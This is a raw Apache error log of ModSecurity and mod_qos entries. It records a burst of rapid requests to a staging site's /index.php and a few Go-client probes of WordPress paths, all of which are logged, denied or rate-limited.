[Tue May 26 20:00:38.298053 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHZgAAABw"]
[Tue May 26 20:00:38.301440 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHUgAAAB0"]
[Tue May 26 20:00:38.306786 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHawAAAHY"]
[Tue May 26 20:00:38.308082 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujIZZc2DoU1lPnP1jgQAAAN4"]
[Tue May 26 20:00:38.315363 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHWwAAACk"]
[Tue May 26 20:00:38.323526 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHZAAAAEM"]
[Tue May 26 20:00:38.327574 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHdwAAAFQ"]
[Tue May 26 20:00:38.328061 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHagAAABc"]
[Tue May 26 20:00:38.332475 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHbQAAAEk"]
[Tue May 26 20:00:38.333734 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujIZZc2DoU1lPnP1jgAAAANc"]
[Tue May 26 20:00:38.341949 2026] [security2:error] [pid 106517:tid 106750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujIZZc2DoU1lPnP1jgwAAAOg"]
[Tue May 26 20:00:38.342310 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHeAAAADY"]
[Tue May 26 20:00:38.347870 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHbgAAADw"]
[Tue May 26 20:00:38.348183 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHcwAAAE8"]
[Tue May 26 20:00:38.352864 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1jywAAALM"]
[Tue May 26 20:00:38.368525 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1jzAAAAN8"]
[Tue May 26 20:00:38.368770 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujGDRMqfxdEDkoswHfwAAAAQ"]
[Tue May 26 20:00:38.371947 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1jyQAAAKw"]
[Tue May 26 20:00:38.383699 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1jzgAAAN0"]
[Tue May 26 20:00:38.385086 2026] [security2:error] [pid 106517:tid 106752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1jzQAAAOo"]
[Tue May 26 20:00:38.395659 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1jxwAAANo"]
[Tue May 26 20:00:38.400006 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujWDRMqfxdEDkoswHygAAAEQ"]
[Tue May 26 20:00:38.408851 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j0QAAANE"]
[Tue May 26 20:00:38.411813 2026] [security2:error] [pid 106517:tid 106704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j0AAAALo"]
[Tue May 26 20:00:38.418309 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujWDRMqfxdEDkoswH0AAAAAg"]
[Tue May 26 20:00:38.420209 2026] [security2:error] [pid 106517:tid 106713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j2wAAAMM"]
[Tue May 26 20:00:38.428277 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujWDRMqfxdEDkoswHxAAAAG0"]
[Tue May 26 20:00:38.429077 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j4gAAAME"]
[Tue May 26 20:00:38.433784 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujWDRMqfxdEDkoswHxgAAAGQ"]
[Tue May 26 20:00:38.435839 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujWDRMqfxdEDkoswH0QAAAGE"]
[Tue May 26 20:00:38.444395 2026] [security2:error] [pid 106517:tid 106675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j2QAAAJ4"]
[Tue May 26 20:00:38.767989 2026] [security2:error] [pid 106517:tid 106764] [client 103.163.220.6:32951] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content.php"] [unique_id "ahWujoZZc2DoU1lPnP1kFAAAAPY"]
[Tue May 26 20:00:39.266711 2026] [security2:error] [pid 106517:tid 106690] [client 103.163.220.16:31901] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/gk.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kLAAAAKw"]
[Tue May 26 20:00:39.278949 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j1gAAAMo"]
[Tue May 26 20:00:39.280358 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujWDRMqfxdEDkoswHzgAAAGw"]
[Tue May 26 20:00:39.292543 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j3wAAAMY"]
[Tue May 26 20:00:39.295062 2026] [security2:error] [pid 106517:tid 106714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j0wAAAMQ"]
[Tue May 26 20:00:39.301191 2026] [security2:error] [pid 106517:tid 106724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j6AAAAM4"]
[Tue May 26 20:00:39.316970 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujWDRMqfxdEDkoswH3wAAAE4"]
[Tue May 26 20:00:39.317084 2026] [security2:error] [pid 106517:tid 106746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j1QAAAOQ"]
[Tue May 26 20:00:39.318685 2026] [security2:error] [pid 106517:tid 106731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j5gAAANU"]
[Tue May 26 20:00:39.323658 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j6gAAAMU"]
[Tue May 26 20:00:39.325352 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujmDRMqfxdEDkoswH6gAAAHU"]
[Tue May 26 20:00:39.329312 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j7AAAAKE"]
[Tue May 26 20:00:39.329598 2026] [security2:error] [pid 106517:tid 106695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j3QAAALE"]
[Tue May 26 20:00:39.331812 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujWDRMqfxdEDkoswH3gAAAA8"]
[Tue May 26 20:00:39.342838 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIGAAAAHk"]
[Tue May 26 20:00:39.351772 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIFwAAAFI"]
[Tue May 26 20:00:39.363977 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujYZZc2DoU1lPnP1j4QAAALg"]
[Tue May 26 20:00:39.366263 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIHQAAACM"]
[Tue May 26 20:00:39.369922 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujoZZc2DoU1lPnP1kEAAAAPc"]
[Tue May 26 20:00:39.371982 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIHAAAAAk"]
[Tue May 26 20:00:39.380456 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kKQAAALM"]
[Tue May 26 20:00:39.386481 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIHwAAAEg"]
[Tue May 26 20:00:39.386494 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kJwAAAKQ"]
[Tue May 26 20:00:39.387046 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kKwAAANY"]
[Tue May 26 20:00:39.387662 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWujmDRMqfxdEDkoswH9wAAACo"]
[Tue May 26 20:00:39.388545 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj4ZZc2DoU1lPnP1kKgAAALQ"]
[Tue May 26 20:00:39.390541 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIIQAAADE"]
[Tue May 26 20:00:39.392844 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIGgAAAFY"]
[Tue May 26 20:00:39.401825 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIIgAAAF8"]
[Tue May 26 20:00:39.416380 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIGQAAAH0"]
[Tue May 26 20:00:39.424590 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIKgAAAEE"]
[Tue May 26 20:00:39.435803 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIIAAAAEQ"]
[Tue May 26 20:00:39.445431 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuj2DRMqfxdEDkoswIIwAAAFU"]
[Tue May 26 20:00:39.681579 2026] [qos:error] [pid 106517:tid 106756] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuj4ZZc2DoU1lPnP1kewAAAO4
[Tue May 26 20:00:39.683906 2026] [qos:error] [pid 106517:tid 106694] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuj4ZZc2DoU1lPnP1kfgAAALA
[Tue May 26 20:00:39.684040 2026] [qos:error] [pid 106517:tid 106718] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuj4ZZc2DoU1lPnP1kfQAAAMg
[Tue May 26 20:00:39.768896 2026] [security2:error] [pid 106517:tid 106677] [client 103.163.220.16:54243] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/languages/"] [unique_id "ahWuj4ZZc2DoU1lPnP1kgwAAAKA"]
[Tue May 26 20:00:39.832280 2026] [qos:error] [pid 106517:tid 106778] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuj4ZZc2DoU1lPnP1khQAAAQQ
[Tue May 26 20:00:39.837105 2026] [qos:error] [pid 106517:tid 106652] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuj4ZZc2DoU1lPnP1khgAAAIc
[Tue May 26 20:00:39.839877 2026] [qos:error] [pid 106517:tid 106776] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuj4ZZc2DoU1lPnP1kiAAAAQI
[Tue May 26 20:00:39.979678 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuj4ZZc2DoU1lPnP1klAAAAJs
[Tue May 26 20:00:39.988828 2026] [qos:error] [pid 106517:tid 106669] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuj4ZZc2DoU1lPnP1klgAAAJg
[Tue May 26 20:00:39.989205 2026] [qos:error] [pid 106517:tid 106763] [client 45.148.10.120:46288] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuj4ZZc2DoU1lPnP1klQAAAPU
